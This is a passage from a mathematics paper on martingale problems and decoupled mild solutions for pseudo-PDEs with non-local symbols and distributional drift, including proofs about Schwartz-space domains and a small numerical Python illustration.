We will now introduce the time-inhomogeneous domain which will be used to extend $\mathcal{D}(-q(\cdot,D))=\mathcal{S}(\mathbbm{R}^d)$.
\begin{definition}\label{Ctopo}
Let $\tau$ be a Hausdorff topological linear space. We will denote by $\mathcal{C}^1([0,T],\tau)$ the set of
functions $\phi\in\mathcal{C}([0,T],\tau)$ such that there exists a function
$\partial_t\phi\in\mathcal{C}([0,T],\tau)$ verifying the following. For every $t_0 \in [0,T]$
we have $\frac{1}{(t - t_0)}(\phi(t)-\phi(t_0))\underset{t\rightarrow t_0}{\overset{\tau}{\longrightarrow}}\partial_t\phi(t_0)$.
\end{definition}
We recall that a topological algebra is a topological space equipped
with a structure of linear algebra
such that addition, multiplication and multiplication by a scalar are continuous.
\begin{lemma}\label{LemmaS1}
Let $\mathcal{A}$ be a (Hausdorff) topological algebra, then $\mathcal{C}^1([0,T],\mathcal{A})$ is a linear algebra, and for any $\phi,\psi\in\mathcal{C}^1([0,T],\mathcal{A})$, we have $\partial_t(\phi\psi)=\psi\partial_t\phi+\phi\partial_t\psi$.
\end{lemma}
\begin{proof}
The proof is analogous to the one for real-valued functions.
\end{proof}
\begin{remark}
Classical examples of topological algebras are
$\mathcal{C}_c^{\infty}(\mathbbm{R}^d)$,
$\mathcal{S}(\mathbbm{R}^d)$, $\mathcal{C}^{\infty}(\mathbbm{R}^d)$, $\mathcal{C}^{m}(\mathbbm{R}^d)$ for some $m\in\mathbbm{N}$ (equipped with their usual
topologies), or $W^{k,p}(\mathbbm{R}^d)\bigcap W^{k,\infty}(\mathbbm{R}^d)$ for any $k \in \mathbbm{N}^*, p \ge 1$, where $W^{k,p}(\mathbbm{R}^d)$ denotes the usual Sobolev space of parameters $k,p$. Those are all
Fr\'echet algebras, except for $\mathcal{C}_c^{\infty}(\mathbbm{R}^d)$ which is only a locally convex one.
\end{remark}
\begin{notation}\label{DefS1}
We set $\mathcal{D}(\partial_t-q(\cdot,D)):=\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$.
\end{notation}
Elements in $\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ will also be seen as functions of two variables, and since convergence in $\mathcal{S}(\mathbbm{R}^d)$ implies pointwise convergence, the usual notion of partial derivative coincides with the notation $\partial_t$ introduced in Definition \ref{Ctopo}. Any $\phi\in\mathcal{D}(\partial_t-q(\cdot,D))$ clearly verifies
\begin{itemize}
\item $\forall t\in[0,T]$, $\phi(t,\cdot)\in\mathcal{S}(\mathbbm{R}^d)$ and $\forall x\in\mathbbm{R}^d$, $\phi(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$;
\item $\forall t\in[0,T]$, $\partial_t\phi(t,\cdot)\in\mathcal{S}(\mathbbm{R}^d)$.
\end{itemize}
Our goal now is to show that $\mathcal{D}(\partial_t-q(\cdot,D))$ also verifies the other items needed to be included in $\mathcal{D}^{max}(\partial_t-q(\cdot,D))$ (see Notation \ref{NotDomain}) and therefore that Corollary \ref{conclusionA4} applies with this domain.
\begin{notation}
Let $\alpha,\beta\in\mathbbm{N}^d$ be multi-indexes, we introduce the semi-norm
\begin{equation}
\|\cdot\|_{\alpha,\beta}:
\begin{array}{rcl}
\mathcal{S}(\mathbbm{R}^d)&\longrightarrow &\mathbbm{R}\\
\phi&\longmapsto &\underset{x\in\mathbbm{R}^d}{\text{sup }}|x^{\alpha}\partial_x^{\beta}\phi(x)|.
\end{array}
\end{equation}
\end{notation}
$\mathcal{S}(\mathbbm{R}^d)$ is a Fr\'echet space whose topology is determined
by the family of seminorms $ \|\cdot\|_{\alpha,\beta}$.
In particular those seminorms are continuous.
\\
In what follows, $\mathcal{F}_x$ will denote the Fourier transform taken in the space variable.
\begin{proposition}\label{PropS0}
Let $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$.
Then $\mathcal{F}_x\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$. Moreover if $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$, then $\mathcal{F}_x\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ and
\\
$\partial_t\mathcal{F}_x\phi=\mathcal{F}_x\partial_t\phi$.
\end{proposition}
\begin{proof}
$\mathcal{F}_x:\mathcal{S}(\mathbbm{R}^d)\longrightarrow \mathcal{S}(\mathbbm{R}^d)$ is continuous, so $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ implies $\mathcal{F}_x\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$. If $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ then $\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ so $\mathcal{F}_x\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$. Then for any $t_0\in[0,T]$, the convergence
\\
$\frac{1}{t-t_0}(\phi(t,\cdot)-\phi(t_0,\cdot))\underset{t\rightarrow t_0}{\overset{\mathcal{S}(\mathbbm{R}^d)}{\longrightarrow}}\partial_t\phi(t_0,\cdot)$ is preserved by the continuous mapping $\mathcal{F}_x$ meaning that (by linearity)
\\
$\frac{1}{t-t_0}(\mathcal{F}_x\phi(t,\cdot)-\mathcal{F}_x\phi(t_0,\cdot))\underset{t\rightarrow t_0}{\overset{\mathcal{S}(\mathbbm{R}^d)}{\longrightarrow}}\mathcal{F}_x\partial_t\phi(t_0,\cdot)$. Since $\mathcal{F}_x\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$, we have shown that $\mathcal{F}_x\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ and $\partial_t\mathcal{F}_x\phi=\mathcal{F}_x\partial_t\phi$.
\end{proof}
\begin{proposition}\label{PropS1}
If $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$, then for any $\alpha,\beta\in\mathbbm{N}^d$,
\\
$(t,x)\longmapsto x^{\alpha}\partial_x^{\beta}\phi(t,x)$
is bounded.
\end{proposition}
\begin{proof}
Let $\alpha,\beta$ be fixed. Since the maps
$\|\cdot\|_{\alpha,\beta}:\mathcal{S}(\mathbbm{R}^d)\rightarrow\mathbbm{R}$ are
continuous, for every $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$,
the application $t\mapsto \|\phi(t,\cdot)\|_{\alpha,\beta}$ is continuous on
the compact interval $[0,T]$ and therefore bounded,
which yields the result.
\end{proof}
\begin{proposition}\label{PropS2}
If $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ and $\alpha,\beta\in\mathbbm{N}^d$, then
there exists a non-negative function $\psi_{\alpha,\beta}\in L^1(\mathbbm{R}^d)$ such that
for every $(t,x)\in [0,T]\times \mathbbm{R}^d$, $|x^{\alpha}\partial_x^{\beta}\phi(t,x)|\leq
\psi_{\alpha,\beta}(x)$.
\end{proposition}
\begin{proof}
We decompose
\begin{equation}
\begin{array}{rcl}
|x^{\alpha}\partial_x^{\beta}\phi(t,x)| &=& |x^{\alpha}\partial_x^{\beta}\phi(t,x)|\mathds{1}_{[-1,1]^d}(x)+|x^{\alpha+(2,\cdots,2)}\partial_x^{\beta}\phi(t,x)|\frac{1}{\underset{i\leq d}{\Pi}x_i^2}\mathds{1}_{\mathbbm{R}^d\backslash[-1,1]^d}(x)\\
&\leq& C(\mathds{1}_{[-1,1]^d}(x)+\frac{1}{\underset{i\leq d}{\Pi}x_i^2}\mathds{1}_{\mathbbm{R}^d\backslash[-1,1]^d}(x)),
\end{array}
\end{equation}
where $C$ is some constant which exists thanks to Proposition \ref{PropS1}.
\end{proof}
\begin{proposition}\label{PropS3}
Let $q$ be a continuous negative definite symbol verifying the assumptions of Theorem \ref{ThmJacob1} and let $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$. Then for any $x\in\mathbbm{R}^d$,
$t\mapsto q(\cdot,D)\phi(t,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$ and $\partial_tq(\cdot,D)\phi=q(\cdot,D)\partial_t\phi$.
\end{proposition}
\begin{proof}
We fix $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ and $x\in\mathbbm{R}^d$. We wish to show that $t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)d\xi$ is $\mathcal{C}^1$ with derivative
\\
$t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\partial_t\phi(t,\xi)d\xi$.
\\
Since $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$, then $\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ and by Proposition \ref{PropS0}, $\mathcal{F}_x\partial_t\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$.
Moreover since $q$ verifies the assumptions of Theorem \ref{ThmJacob1}, then $|q(x,\xi)|$ is bounded by $c'(1+\|\xi\|^2)$ for some constant $c'$.
Therefore by Proposition \ref{PropS2}, there exists a non-negative $\psi\in L^1(\mathbbm{R}^d)$ such that for every $t,\xi$, $|q(x,\xi)\mathcal{F}_x\partial_t\phi(t,\xi)|\leq \psi(\xi)$. Since by Proposition \ref{PropS0}, $\mathcal{F}_x\partial_t\phi=\partial_t\mathcal{F}_x\phi$, this implies that for any $(t,\xi)$, $|\partial_t\left(e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)\right)|\leq \psi(\xi)$. So by the
theorem about the differentiation of integrals depending on a parameter,
$t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)d\xi$ is of class
$\mathcal{C}^1$ with derivative $t\longmapsto \frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\partial_t\phi(t,\xi)d\xi$.
\end{proof}
\begin{proposition}\label{PropS4}
Let $q$ be a continuous negative definite symbol verifying the assumptions of Theorem \ref{ThmJacob1} and let $\phi\in\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$. Then $\phi$, $\partial_t\phi$, $q(\cdot,D)\phi$ and $q(\cdot,D)\partial_t\phi$ are bounded.
\end{proposition}
\begin{proof}
Proposition \ref{PropS1} implies that any element of $\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ is bounded, so we immediately deduce that $\phi$ and $\partial_t\phi$ are bounded.
\\
Since $q$ verifies the assumptions of Theorem \ref{ThmJacob1},
for any fixed $(t,x)\in[0,T]\times \mathbbm{R}^d$, we have
\begin{equation}
\begin{array}{rcl}
|q(\cdot,D)\phi(t,x)|&=& \left|\frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}_x\phi(t,\xi)d\xi\right|\\
&\leq& C\int_{\mathbbm{R}^d}(1+\|\xi\|^2)|\mathcal{F}_x\phi(t,\xi)|d\xi,
\end{array}
\end{equation}
for some constant $C$.
Since $\phi\in\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$ then,
by Proposition \ref{PropS0},
$\mathcal{F}_x\phi$ also belongs to
$\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$, and by Proposition \ref{PropS2}, there exists a non-negative $\psi\in L^1(\mathbbm{R}^d)$ such that for any $(t,\xi)$, $(1+\|\xi\|^2)|\mathcal{F}_x\phi(t,\xi)|\leq \psi(\xi)$, so for any $(t,x)$, $|q(\cdot,D)\phi(t,x)|\leq \|\psi\|_1$.
\\
\\
Similar arguments hold replacing $\phi$ with $\partial_t\phi$ since it also belongs to $\mathcal{C}([0,T],\mathcal{S}(\mathbbm{R}^d))$.
\end{proof}
\begin{remark} \label{RSobolev}
$\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$ seems
to be a domain which is particularly appropriate for time-dependent Fourier
analysis, and it fits our framework well.
On the other hand, it is not so fundamental to require such regularity
for classical solutions of Pseudo-PDEs, so that we could
consider a larger domain. For example,
the Fr\'echet algebra $\mathcal{S}(\mathbbm{R}^d)$ could be replaced
with the Banach algebra $W^{d+3,1}(\mathbbm{R}^d)\bigcap W^{d+3,\infty}(\mathbbm{R}^d)$
in all the previous proofs.
\\
Even bigger domains are certainly possible; we will however not
insist on such refinements.
\end{remark}
\begin{corollary}\label{CoroS1}
Let $q$ be a continuous negative definite symbol verifying the hypotheses of Theorem \ref{ThmJacob1}. Then
$\mathcal{D}(\partial_t-q(\cdot,D))$
is a linear algebra included in $\mathcal{D}^{max}(\partial_t-q(\cdot,D))$ as defined in Notation \ref{NotDomain}.
\end{corollary}
\begin{proof}
We recall that, according to Notation \ref{DefS1}
$\mathcal{D}(\partial_t-q(\cdot,D))
=\mathcal{C}^1([0,T],\mathcal{S}(\mathbbm{R}^d))$.
The proof follows from Lemma \ref{LemmaS1}, Propositions \ref{PropS3} and \ref{PropS4}, and the comments under Notation \ref{DefS1}.
\end{proof}
\begin{corollary}\label{CoroJacob}
Let $q$ be a continuous negative definite symbol verifying the hypotheses of Theorem \ref{ThmJacob1}, let $(\mathbbm{P}^x)_{x\in\mathbbm{R}^d}$ be the corresponding homogeneous Markov class exhibited in Theorem \ref{ThmJacob1}, let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times \mathbbm{R}^d}$ be the corresponding Markov class (see Notation \ref{HomogeneNonHomogene}), let $(\mathcal{D}(\partial_t-q(\cdot,D)),\partial_t-q(\cdot,D))$ be as in Notation \ref{DefS1}.
Then
\begin{itemize}
\item $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times \mathbbm{R}^d}$ solves the well-posed Martingale Problem associated to $(\mathcal{D}(\partial_t-q(\cdot,D)),\partial_t-q(\cdot,D),V_t\equiv t)$;
\item its transition function is measurable in time.
\end{itemize}
\end{corollary}
\begin{proof}
The first statement directly comes from Theorem \ref{ThmJacob1} and Corollaries \ref{CoroS1} and \ref{conclusionA4}, and the second from Proposition \ref{HomoMeasurableint}.
\end{proof}
\begin{remark}
The symbol of the fractional Laplacian $q:(x,\xi)\mapsto\|\xi\|^{\alpha}$ trivially verifies the assumptions of Theorem \ref{ThmJacob1}. Indeed, it has no dependence in $x$, so it is enough to set $\psi:\xi\mapsto \|\xi\|^{\alpha}$, $c_0=c=c'=1$, $r_0=\alpha$ and $\gamma\equiv\frac{1}{2}$.
\end{remark}
The Pseudo-PDE that we focus on is the following.
\begin{equation}\label{PDEsymbol}
\left\{
\begin{array}{rcl}
\partial_tu-q(\cdot,D)u + f\left(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}\right)=0 \,\text{ on }[0,T]\times\mathbbm{R}^d\\
u(T,\cdot)=g,
\end{array}\right.
\end{equation}
where $q$ is a continuous negative definite symbol verifying the assumptions of Theorem \ref{ThmJacob1} and $\Gamma$ is the associated carr\'e du champs operator, see Definition \ref{SFO}.
\begin{remark} \label{R418}
By Proposition 3.3 in \cite{di2012hitchhikers}, for any $\alpha\in]0,2[$, there exists a constant $c_{\alpha}$ such that for any $\phi\in\mathcal{S}(\mathbbm{R}^d)$,
\begin{equation}\label{FracLap}
(-\Delta)^{\frac{\alpha}{2}}\phi = c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi(\cdot+y)-\phi)}{\| y\|^{d+\alpha}}dy,
\end{equation}
where $PV$ is a notation for principal value, see (3.1) in \cite{di2012hitchhikers}. Therefore in the particular case of the fractional Laplace operator, the carr\'e du champs operator $\Gamma^{\alpha}$ associated to $(-\Delta)^{\frac{\alpha}{2}}$ is given by
\begin{equation}
\begin{array}{rcl}
&&\Gamma^{\alpha}(\phi,\phi)\\
&=& c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi^2(\cdot+y)-\phi^2)}{\| y\|^{d+\alpha}}dy-2\phi c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi(\cdot+y)-\phi)}{\| y\|^{d+\alpha}}dy\\
&=&c_{\alpha}PV\int_{\mathbbm{R}^d} \frac{(\phi(\cdot+y)-\phi)^2}{\| y\|^{d+\alpha}}dy.
\end{array}
\end{equation}
\end{remark}
\begin{proposition}
Let $q$ be a continuous negative definite symbol verifying the assumptions of Theorem \ref{ThmJacob1}, and let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times \mathbbm{R}^d}$ be the Markov class which by Corollary \ref{CoroJacob} solves the well-posed Martingale Problem associated to
\\
$(\mathcal{D}(\partial_t-q(\cdot,D)),\partial_t-q(\cdot,D),V_t \equiv t)$.
\\
For any $(f,g)$ verifying $H^{lip}_b$ (see Hypothesis \ref{Hpq}), $Pseudo-PDE(f,g)$ admits a unique decoupled mild solution in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{proof}
The assertion comes from Corollary \ref{CoroJacob} and Theorem \ref{MainTheorem}.
\end{proof}
\subsection{Parabolic semi-linear PDEs with distributional drift}\label{S4c}
In this section we will use the formalism and results obtained
in \cite{frw1} and \cite{frw2}, see also \cite{trutnau}, \cite{diel}
for more recent developments. In particular the latter
paper treats interesting applications to polymers.
Those papers introduced a suitable framework of
Martingale Problem related to a PDE operator
containing a distributional drift $b'$ which is the
derivative of a continuous function.
A first work in the $n$-dimensional setting was carried out in \cite{issoglio}.
Let $b,\sigma\in \mathcal{C}^0(\mathbbm{R})$ such that $\sigma>0$.
By mollifier we mean a function $\Phi\in\mathcal{S}(\mathbbm{R})$ with $\int \Phi(x)dx=1$.
We denote $\Phi_n(x)=n\Phi(nx)$, $\sigma^2_n = \sigma^2\ast \Phi_n$, $b_n=b\ast \Phi_n$.
\\
We then define $L_ng=\frac{\sigma^2_n}{2}g''+b_n'g'$.
$f\in\mathcal{C}^1(\mathbbm{R})$ is said to be a solution to $Lf =\dot{l}$, where $\dot{l}\in\mathcal{C}^0$, if for any mollifier $\Phi$, there are sequences $(f_n)$ in $\mathcal{C}^2$ and $(\dot{l}_n)$ in $\mathcal{C}^0$ such that $L_nf_n=\dot{l}_n\text{, }f_n\overset{\mathcal{C}^1}{\longrightarrow}f\text{, }\dot{l}_n\overset{\mathcal{C}^0}{\longrightarrow}\dot{l}$.
We will assume that
$\Sigma(x) =\underset{n\rightarrow\infty}{\text{lim }}2\int_0^x\frac{b'_n}{\sigma^2_n}(y)dy$
exists in $\mathcal{C}^0$, independently of the mollifier.
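As a toy numerical illustration (our own example, not taken from \cite{frw1}; the Gaussian mollifier and the helper names below are arbitrary choices): take $\sigma\equiv 1$ and $b(x)=|x|$, so that $\sigma^2_n\equiv 1$ and $2\int_0^x\frac{b'_n}{\sigma^2_n}(y)dy=2(b_n(x)-b_n(0))$, which converges to $\Sigma(x)=2|x|$.

```python
import numpy as np

# Toy illustration: sigma = 1 and b(x) = |x|, mollified by the Gaussian
# mollifier Phi_n(x) = n * Phi(n x). Then Sigma_n(x) = 2 (b_n(x) - b_n(0))
# converges to Sigma(x) = 2 |x| as n -> infinity.
z = np.linspace(-10.0, 10.0, 200001)          # quadrature grid
dz = z[1] - z[0]
phi = np.exp(-z**2 / 2) / np.sqrt(2 * np.pi)  # standard Gaussian mollifier

def b_n(x, n):
    # (b * Phi_n)(x) = \int |x - z/n| Phi(z) dz after substitution z = n y
    return np.sum(np.abs(x - z / n) * phi) * dz

def Sigma_n(x, n):
    return 2 * (b_n(x, n) - b_n(0.0, n))

assert abs(Sigma_n(1.0, 1000) - 2.0) < 1e-2   # close to Sigma(1) = 2|1| = 2
```

Here $b_n(0)=\frac{1}{n}\sqrt{2/\pi}\rightarrow 0$ and $b_n(1)\rightarrow 1$, so the approximation $\Sigma_n(1)$ indeed approaches $2$, and the limit does not depend on the mollifier chosen.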
\\
\\
By Proposition 2.3 in \cite{frw1} there exists a solution $h\in\mathcal{C}^1$ to $Lh=0\text{, }h(0)=0\text{, }h'(0)=1$.
Moreover it verifies $h'=e^{-\Sigma}$. Furthermore, by Remark 2.4 in
\cite{frw1},
for any $\dot{l}\in\mathcal{C}^0$, $x_0,x_1\in\mathbbm{R}$,
there exists a unique solution of
\begin{equation}
Lf(x)=\dot{l}\text{, }f\in\mathcal{C}^1\text{, }f(0)=x_0\text{, }f'(0)=x_1.
\end{equation}
$\mathcal{D}_L$ is defined as the set of $f\in\mathcal{C}^1$ such that there exists some $\dot{l}\in\mathcal{C}^0$ with $Lf=\dot{l}$. By Lemma 2.9 in \cite{frw1}, it is equal to the set of $f\in\mathcal{C}^1$ such that $\frac{f'}{h'}\in\mathcal{C}^1$, so it is clearly an algebra.
\\
$h$ is strictly increasing and $I$ will denote its image. Let $L^0$ be the classical differential operator defined by $L^0\phi=\frac{\sigma^2_0}{2}\phi''$,
where
\begin{equation}
\sigma_0(y)=\left\{
\begin{array}{rcl}
(\sigma h')(h^{-1}(y)) & : & y\in I\\
0 & : & y\in I^c.
\end{array}\right.
\end{equation}
\\
Let $v$ be the unique solution to $Lv=1\text{, }v(0)=v'(0)=0$. We will assume that
\begin{equation}\label{NonExplosion}
v(-\infty)=v(+\infty)=+\infty,
\end{equation}
which represents a non-explosion condition.
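As an elementary sanity check of \eqref{NonExplosion} (a toy example of ours, not taken from \cite{frw1}): if $b=0$ and $\sigma\equiv 1$, then $\Sigma=0$, $h(x)=x$, and $v$ solves $\frac{1}{2}v''=1$ with $v(0)=v'(0)=0$, so that
\begin{equation}
v(x)=x^2\quad\text{and}\quad v(-\infty)=v(+\infty)=+\infty,\nonumber
\end{equation}
hence the non-explosion condition holds, as expected for Brownian motion.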
In this case, Proposition 3.13 in \cite{frw1} states that the Martingale
Problem associated to
$(\mathcal{D}_L,L,V_t\equiv t)$ is well-posed. Its solution will be denoted $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}}$.
By Proposition 2.13 in \cite{frw1}, $\mathcal{D}_{L^0} = \mathcal{C}^2(I)$,
and by Proposition 3.2 in \cite{frw1}, the Martingale Problem associated to
$(\mathcal{D}_{L^0},L^0,V_t\equiv t)$
is also well-posed; we will call $(\mathbbm{Q}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}}$ its solution. Moreover, under any $\mathbbm{P}^{s,x}$ the canonical process is a Dirichlet process, and $h(X)$ is a semi-martingale that we call $Y$;
it solves in law the SDE $Y_t=h(x)+\int_s^t\sigma_0(Y_r)dW_r$, the law of $Y$ being $\mathbbm{Q}^{s,h(x)}$. $X$ is a $\mathbbm{P}^{s,x}$-Dirichlet process
whose martingale component is $\int_s^{\cdot}\sigma(X_r)dW_r$.
$(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}}$ and $(\mathbbm{Q}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}}$ both define Markov classes.
\\
We introduce now the domain that we will indeed use.
\begin{definition}\label{domain}
We set
\begin{equation}
\mathcal{D}(a)=\left\{
\phi\in\mathcal{C}^{1,1}([0,T]\times\mathbbm{R}):\frac{\partial_x\phi}{h'}\in\mathcal{C}^{1,1}([0,T]\times\mathbbm{R})\right\},
\end{equation}
which clearly is a linear algebra.
\\
On $\mathcal{D}(a)$, we set $L\phi:=\frac{\sigma^2h'}{2}\partial_x(\frac{\partial_x\phi}{h'})$ and $a(\phi):=\partial_t\phi+L\phi$.
\end{definition}
\begin{proposition}
Let $\Gamma$ denote the carr\'e du champs operator associated to $a$ and let $\phi,\psi$ be in $\mathcal{D}(a)$; then $\Gamma(\phi,\psi)=\sigma^2\partial_x\phi\partial_x\psi$.
\end{proposition}
\begin{proof}
We fix $\phi,\psi$ in $\mathcal{D}(a)$. We write
\begin{equation}
\begin{array}{rcl}
\Gamma(\phi,\psi)&=& (\partial_t+L)(\phi\psi)-\phi(\partial_t+L)(\psi)-\psi(\partial_t+L)(\phi)\\
&=& \frac{\sigma^2h'}{2}\left(\partial_x\left(\frac{\partial_x(\phi\psi)}{h'}\right)-\phi\partial_x\left(\frac{\partial_x\psi}{h'}\right)-\psi\partial_x\left(\frac{\partial_x\phi}{h'}\right)\right)\\
&=& \sigma^2\partial_x\phi\partial_x\psi.
\end{array}
\end{equation}
\end{proof}
Emphasizing that $b'$ is a distribution,
the equation that we will study in this section is therefore given by
\begin{equation}\label{PDEdistri}
\left\{
\begin{array}{l}
\partial_tu + \frac{1}{2}\sigma^2\partial^2_x u + b'\partial_xu +f(\cdot,\cdot,u,\sigma|\partial_xu|)=0\quad\text{ on }[0,T]\times\mathbbm{R}\\
u(T,\cdot) = g.
\end{array}\right.
\end{equation}
\begin{proposition}\label{MPnewdomaindistri}
$(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}}$ solves the Martingale Problem associated to $(\mathcal{D}(a),a,V_t\equiv t)$.
\end{proposition}
\begin{proof}
Let $\phi\in\mathcal{D}(a)$ and $(s,x)\in[0,T]\times\mathbbm{R}$ be fixed. The map $(t,y)\mapsto \phi(t,h^{-1}(y))$ is of class $\mathcal{C}^{1,2}$; moreover
$\partial_x\left(\phi(r,\cdot)\circ h^{-1}\right)=\frac{\partial_x\phi}{h'}\circ h^{-1}$ and
$\partial_x^2\left(\phi(r,\cdot)\circ h^{-1}\right)=\frac{2L\phi}{\sigma^2h'^2}\circ h^{-1}=\frac{2L\phi}{\sigma_0^2}\circ h^{-1}$.
By It\^o formula we have
\begin{equation}
\begin{array}{rcl}
\phi(t,X_t)&=&\phi(t,h^{-1}(Y_t))\\
&=&\phi(s,x)+\int_s^t\left(\partial_t\phi(r,h^{-1}(Y_r))+\frac{1}{2}\sigma_0^2(Y_r)\partial_x^2\left(\phi(r,\cdot)\circ h^{-1}\right)(Y_r)\right)dr\\
&&+ \int_s^t\sigma_0(Y_r)\partial_x\left(\phi(r,\cdot)\circ h^{-1}\right)(Y_r)dW_r\\
&=&\phi(s,x)+\int_s^t\left(\partial_t\phi(r,h^{-1}(Y_r))+L\phi(r,h^{-1}(Y_r))\right)dr\\
&&+\int_s^t\sigma_0(Y_r)\frac{\partial_x\phi}{h'}(r,h^{-1}(Y_r))dW_r\\
&=&\phi(s,x)+\int_s^t\left(\partial_t\phi(r,X_r)+L\phi(r,X_r)\right)dr+\int_s^t\sigma(X_r)\partial_x\phi(r,X_r)dW_r.
\end{array}
\end{equation}
Therefore $\phi(t,X_t)-\phi(s,x)-\int_s^ta(\phi)(r,X_r)dr=\int_s^t\sigma(X_r)\partial_x\phi(r,X_r)dW_r$ is a local martingale.
\end{proof}
In order to consider the $FBSDE^{s,x}(f,g)$ for functions $(f,g)$ having polynomial growth in $x$, we will show the following result.
We first formulate a supplementary assumption, called (TA) in \cite{frw1}.
It means the existence of strictly positive constants $c_1, C_1$ such that
\begin{equation} \label{(TA)}
c_1 \le \frac{e^\Sigma}{\sigma} \le C_1.
\end{equation}
\begin{proposition}\label{MomentsDistri}
We suppose that (TA) is fulfilled and $\sigma$ has linear growth.
Then, for any $p > 0$ and $(s,x)\in[0,T]\times\mathbbm{R}$, $\mathbbm{E}^{s,x}[|X_T|^p]<\infty$ and
$\mathbbm{E}^{s,x}[\int_s^T|X_r|^p dr]<\infty$. In other words,
the Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}}$ verifies $H^{mom}(\zeta,\eta)$ (see Hypothesis \ref{HypMom}),
for $\zeta:x\longmapsto |x|^p$ and $\eta:x\longmapsto |x|^q$,
for every $p,q>0$.
\end{proposition}
\begin{proof}
We start by proving the proposition in the divergence form case,
meaning that $b=\frac{\sigma^2}{2}$.
\\
Let $(s,x)$ and $t\in[s,T]$ be fixed; since $|X_t|^p\leq 1+|X_t|^{\lceil p\rceil}$, it is enough to
consider integer $p$. Thanks to the Aronson estimates,
see e.g. \cite{ar} and also Section 5 of \cite{frw1}, there is a
constant $M > 0$ such that
\begin{equation}
\begin{array}{rcl}
\mathbbm{E}^{s,x}[|X_t|^p] &=&\int_{\mathbbm{R}}|y|^pp_{t-s}(x,y)dy\\
&\leq& \frac{M}{\sqrt{t-s}}\int_{\mathbbm{R}}|y|^pe^{-\frac{|x-y|^2}{M(t-s)}}dy\\
&=&M^{\frac{3}{2}}\int_{\mathbbm{R}}|x+z\sqrt{M(t-s)}|^pe^{-z^2}dz\\
&\leq&\sum_{k=0}^p M^{\frac{3+p-k}{2}} \binom{p}{k}
|x|^k|t-s|^{\frac{p-k}{2}}\int_{\mathbbm{R}}|z|^{p-k}e^{-z^2}dz,
\end{array}
\end{equation}
which
(for fixed $(s,x)$) is bounded in $t \in [s,T] $
and therefore Lebesgue integrable in $t$ on $[s,T]$.
This in particular shows that $\mathbbm{E}^{s,x}[|X_T|^p]$ and
$ \mathbbm{E}^{s,x}[\int_s^T|X_r|^pdr] (=
\int_s^T\mathbbm{E}^{s,x}[|X_r|^p]dr)$ are finite.
\\
Now we consider the general case, in which $X$ only verifies \eqref{(TA)} and we add the hypothesis that $\sigma$ has linear growth.
\\
Then there exists a process $Z$ (see Lemma 5.6 in \cite{frw1}) solving an SDE with distributional drift whose generator is in divergence form, and a
function $k$ of class $\mathcal{C}^1$ such that $X=k^{-1}(Z)$. The
\eqref{(TA)} condition implies the existence of two constants such that $0<c\leq k'\sigma \leq C$, so that for any $x$,
$(k^{-1})'(x)=\frac{1}{k'\circ k^{-1}(x)}\leq \frac{\sigma\circ k^{-1}(x)}{c}\leq C_2(1+ |k^{-1}(x)|)$,
